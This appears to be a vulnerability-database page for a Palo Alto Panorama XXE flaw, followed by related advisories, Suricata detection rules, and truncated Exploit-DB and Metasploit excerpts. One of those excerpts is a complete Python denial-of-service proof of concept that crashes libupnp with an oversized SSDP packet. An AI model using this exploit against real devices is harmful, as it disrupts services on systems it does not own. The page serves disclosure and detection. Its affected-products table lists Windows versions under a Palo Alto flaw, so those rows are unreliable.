CVE-2020-2012
published 2020-05-13CVE-2020-2012: Improper restriction of XML external entity reference ('XXE') vulnerability in Palo Alto Networks Panorama management service allows remote unauthenticated…
PriorityP351high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EPSS
1.93%
77.5th percentile
Improper restriction of XML external entity reference ('XXE') vulnerability in Palo Alto Networks Panorama management service allows remote unauthenticated attackers with network access to the Panorama management interface to read arbitrary files on the system. This issue affects: All versions of PAN-OS for Panorama 7.1 and 8.0; PAN-OS for Panorama 8.1 versions earlier than 8.1.13; PAN-OS for Panorama 9.0 versions earlier than 9.0.7.
Affected
26 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1709 | — | — |
| msrc | windows_10_version_1803 | — | — |
| msrc | windows_10_version_1809 | — | — |
| msrc | windows_10_version_1903 | — | — |
| msrc | windows_10_version_1909 | — | — |
| msrc | windows_10_version_2004 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_8.1 | — | — |
| msrc | windows_rt_8.1 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
| msrc | windows_server_2012 | — | — |
| msrc | windows_server_2012_r2 | — | — |
| msrc | windows_server_2016 | — | — |
| msrc | windows_server_2019 | — | — |
| palo_alto_networks | pan-os | — | — |
| palo_alto_networks | pan-os | — | — |
| palo_alto_networks | pan-os | >= 8.1 < 8.1.13 | 8.1.13 |
| palo_alto_networks | pan-os | >= 9.0 < 9.0.7 | 9.0.7 |
| paloalto | pan-os | — | — |
| paloaltonetworks | pan-os | 7.1.0 – 7.1.26 | — |
| paloaltonetworks | pan-os | 8.0.0 – 8.0.20 | — |
| paloaltonetworks | pan-os | >= 8.1.0 < 8.1.13 | 8.1.13 |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_msrc7.8HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Palo Alto
PAN-OS: Panorama: XML external entity reference ('XXE') vulnerability leads the to information leak
vendor_paloalto·2020-05-13·CVSS 7.5
CVE-2020-2012 [HIGH] CWE-611 PAN-OS: Panorama: XML external entity reference ('XXE') vulnerability leads the to information leak
PAN-OS: Panorama: XML external entity reference ('XXE') vulnerability leads the to information leak
Improper restriction of XML external entity reference ('XXE') vulnerability in Palo Alto Networks Panorama management service allows remote unauthenticated attackers with network access to the Panorama management interface to read arbitrary files on the system.
This issue affects:
All versions of PAN-OS for Panorama 7.1 and 8.0;
PAN-OS for Panorama 8.1 versions earlier than 8.1.13;
PAN-OS for Panorama 9.0 versions earlier than 9.0.7.
Affected products: PAN-OS
Solution: This issue is fixed in PAN-OS 8.1.13, PAN-OS 9.0.7, PAN-OS 9.1.0, and all later PAN-OS versions.
PAN-OS 8.0 is now end-of-life as of October 31, 2019, and is no longer covered by our Product Security Assurance policies.
GHSA
GHSA-mrg8-5g36-q5f9: Improper restriction of XML external entity reference ('XXE') vulnerability in Palo Alto Networks Panorama management service allows remote unauthenti
ghsa_unreviewed·2022-05-24
CVE-2020-2012 [MEDIUM] GHSA-mrg8-5g36-q5f9: Improper restriction of XML external entity reference ('XXE') vulnerability in Palo Alto Networks Panorama management service allows remote unauthenti
Improper restriction of XML external entity reference ('XXE') vulnerability in Palo Alto Networks Panorama management service allows remote unauthenticated attackers with network access to the Panorama management interface to read arbitrary files on the system. This issue affects: All versions of PAN-OS for Panorama 7.1 and 8.0; PAN-OS for Panorama 8.1 versions earlier than 8.1.13; PAN-OS for Panorama 9.0 versions earlier than 9.0.7.
Suricata
ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt
suricata·2012-09-28
CVE-2007-1036 ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt
ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/invoker/JMXInvokerServlet/"; nocase; reference:cve,2007-1036; reference:url,exploit-db.com/exploits/21080/; classtype:web-application-attack; sid:2015747; rev:4; metadata:created_at 2012_09_28, cve CVE_2007_1036, confidence Medium, signature_severity Major, updated_at 2020_04_22;)
Suricata
ET EXPLOIT Access To mm-forms-community upload dir (Inbound)
suricata·2012-09-22
CVE-2012-3574 ET EXPLOIT Access To mm-forms-community upload dir (Inbound)
ET EXPLOIT Access To mm-forms-community upload dir (Inbound)
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Access To mm-forms-community upload dir (Inbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/wp-content/plugins/mm-forms-community/upload/temp/"; fast_pattern; reference:url,www.exploit-db.com/exploits/18997/; reference:cve,2012-3574; classtype:trojan-activity; sid:2015727; rev:4; metadata:created_at 2012_09_22, cve CVE_2012_3574, signature_severity Major, updated_at 2020_09_01;)
Suricata
ET EXPLOIT Access To mm-forms-community upload dir (Outbound)
suricata·2012-09-22
CVE-2012-3574 ET EXPLOIT Access To mm-forms-community upload dir (Outbound)
ET EXPLOIT Access To mm-forms-community upload dir (Outbound)
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Access To mm-forms-community upload dir (Outbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/wp-content/plugins/mm-forms-community/upload/temp/"; fast_pattern; reference:url,www.exploit-db.com/exploits/18997/; reference:cve,2012-3574; classtype:trojan-activity; sid:2015726; rev:4; metadata:created_at 2012_09_22, cve CVE_2012_3574, signature_severity Major, updated_at 2020_09_01;)
Exploit-DB
libupnp 1.6.18 - Stack-based buffer overflow (DoS)
exploitdb·2020-11-27·CVSS 10.0
CVE-2012-5958 [CRITICAL] libupnp 1.6.18 - Stack-based buffer overflow (DoS)
libupnp 1.6.18 - Stack-based buffer overflow (DoS)
---
# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958
import socket
payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"
byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))
Exploit-DB
CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
exploitdb·2020-03-02·CVSS 9.8
CVE-2020-8012 [CRITICAL] CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
---
# Exploit Title: CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
# Exploit Author: wetw0rk
# Exploit Version: Public POC
# Vendor Homepage: https://docops.ca.com/ca-unified-infrastructure-management/9-0-2/en
# Software Version : 7.80
# Tested on: Windows 10 Pro (x64), Windows Server 2012 R2 Standard (x64)
# CVE: CVE-2020-8012
/**************************************************************************************************************************
* *
* Description: *
* *
* Unauthenticated Nimbus nimcontroller RCE, tested against build 7.80.3132 although multiple versions are affected. *
* The exploit won't crash the service. *
* *
* You may have to run the exploit code multiple tim
Exploit-DB
Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
exploitdb·2020-01-29·CVSS 8.1
CVE-2018-8413 [HIGH] Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
---
# Exploit Title: Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
# Google Dork: n/a
# Date: 2020-10-28
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://www.microsoft.com/
# Software Link: http://www.microsoft.com/
# Version: 10 v.1803 (17134.407)
# Tested on: Windows 7, 8.0, 8.1, 10, Server 2012, Server 2012 R2, Server 2016, Server 2019
# CVE : CVE-2018-8413
# Discovered by: Eduardo Braun Prado
[Details]
Microsoft 'themepack' files are classic '.theme' files compressed for
sharing over the internet. Theme files
allows users to customize visual aspects of their device, such as icons
for known features like 'My computer'
and 'trash bin' folders, the default screensaver (which by the way
allowed attacke
Exploit-DB
HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit)
exploitdb·2012-10-29
CVE-2012-2020 HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit)
HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in HP Operations Agent for
Windows. The vulnerability exists in the HP Software Performance Core Program
component (coda.exe) when parsing requests for the 0x8c opcode. This module has
been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and
Windows 2003 SP2 (DEP bypass).
The coda.exe com
Nuclei
Canon Devices - Authentication Bypass in Catwalk Server
nuclei·CVSS 7.5
CVE-2021-38154 [HIGH] Canon Devices - Authentication Bypass in Catwalk Server
Canon Devices - Authentication Bypass in Catwalk Server
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
Template:
id: CVE-2021-38154
info:
name: Canon Devices - Authentication Bypass in Catwalk Server
author: daffainfo
severity: high
description: |
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is
Unit42
Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
blogs_unit42·2020-07-21·CVSS 10.0
CVE-2020-1350 [CRITICAL] Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
## Executive Summary
In July 2020, Microsoft released a security update, CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability, for a new remote code execution (RCE) vulnerability.
This vulnerability exists within the Microsoft Windows Domain Name System (DNS) Server due to the improper handling of certain types of requests, specifically over port 53/TCP. Exploitation of this vulnerability is possible by creating an integer overflow, potentially leading to remote code execution.
This vulnerability only affects Windows DNS and the following builds of the Microsoft Windows operating system (OS):
- Windows Server 2008/2008 R2
- Windows Server 2012/2012 R2
- Windows Server 2016
- Windows Server 2019
- Windows Server version 1803/1903/1909/2004 (Server Core installation)
#
Tenable
CVE-2020-2021: Palo Alto Networks PAN-OS Vulnerable to Critical Authentication Bypass Vulnerability
blogs_tenable·2020-06-29·CVSS 10.0
[CRITICAL] CVE-2020-2021: Palo Alto Networks PAN-OS Vulnerable to Critical Authentication Bypass Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
2020-05-13
Published